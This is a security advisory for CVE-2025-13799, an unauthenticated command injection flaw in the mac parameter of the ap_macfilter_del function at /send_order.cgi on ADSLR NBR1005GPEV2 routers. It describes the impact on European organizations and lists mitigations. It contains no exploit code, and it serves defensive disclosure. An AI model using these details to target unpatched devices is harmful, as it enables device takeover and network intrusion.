CVE-2025-13799 is a command injection vulnerability identified in the ADSLR NBR1005GPEV2 router firmware version 250814-r037c. The vulnerability resides in the ap_macfilter_del function of the /send_order.cgi endpoint, where the mac parameter is improperly sanitized, allowing an attacker to inject arbitrary OS commands. This flaw can be exploited remotely over the network without requiring authentication or user interaction, making it a significant risk for exposed devices. The vulnerability was responsibly disclosed to the vendor, who has not issued a response or patch. The CVSS 4.0 score of 5.3 reflects a medium severity, considering the ease of exploitation (network accessible, no privileges needed), but limited impact on confidentiality, integrity, and availability (each rated low). The vulnerability could allow attackers to execute commands with the privileges of the web server process, potentially leading to full device compromise, network disruption, or pivoting to internal networks. No public exploits have been observed in the wild yet, but the public disclosure increases the risk of exploitation. The affected product is a network router commonly used in small to medium enterprise or residential environments, which may be part of critical network infrastructure. The lack of vendor response and patch availability necessitates immediate defensive measures by users and administrators.

For European organizations, this vulnerability poses a risk of unauthorized remote command execution on affected ADSLR NBR1005GPEV2 routers. Successful exploitation could lead to device takeover, allowing attackers to manipulate network traffic, intercept sensitive data, disrupt connectivity, or use the compromised router as a foothold for further attacks within the internal network. This is particularly concerning for organizations relying on these routers for critical communications or those with remote management interfaces exposed to the internet. The medium severity score reflects limited but tangible impacts on confidentiality, integrity, and availability. However, the absence of authentication and user interaction requirements increases the likelihood of exploitation if devices are exposed. The lack of vendor patch means organizations must rely on network-level mitigations or device replacement to reduce risk. Disruption or compromise of network infrastructure could affect business continuity, data privacy compliance, and operational security, especially in sectors like finance, healthcare, and government within Europe.

1. Immediately identify and inventory all ADSLR NBR1005GPEV2 devices running firmware version 250814-r037c within the network. 2. Restrict remote access to the router management interface by implementing network segmentation and firewall rules to block external access to /send_order.cgi or the router’s web interface. 3. Disable or limit the use of MAC filtering features if not essential, as the vulnerability is in the ap_macfilter_del function. 4. Monitor network traffic and device logs for unusual command execution patterns or unexpected outbound connections indicative of exploitation attempts. 5. If possible, upgrade to a newer firmware version or alternative device models not affected by this vulnerability; if no patch is available, consider device replacement. 6. Employ intrusion detection/prevention systems (IDS/IPS) tuned to detect command injection attempts targeting this endpoint. 7. Educate IT staff about this vulnerability and ensure incident response plans include steps for potential exploitation scenarios. 8. Regularly review and update network device configurations to minimize exposure of management interfaces. 9. Engage with ADSLR or third-party security vendors for potential unofficial patches or workarounds. 10. Implement network-level anomaly detection to identify lateral movement or unusual activity stemming from compromised routers.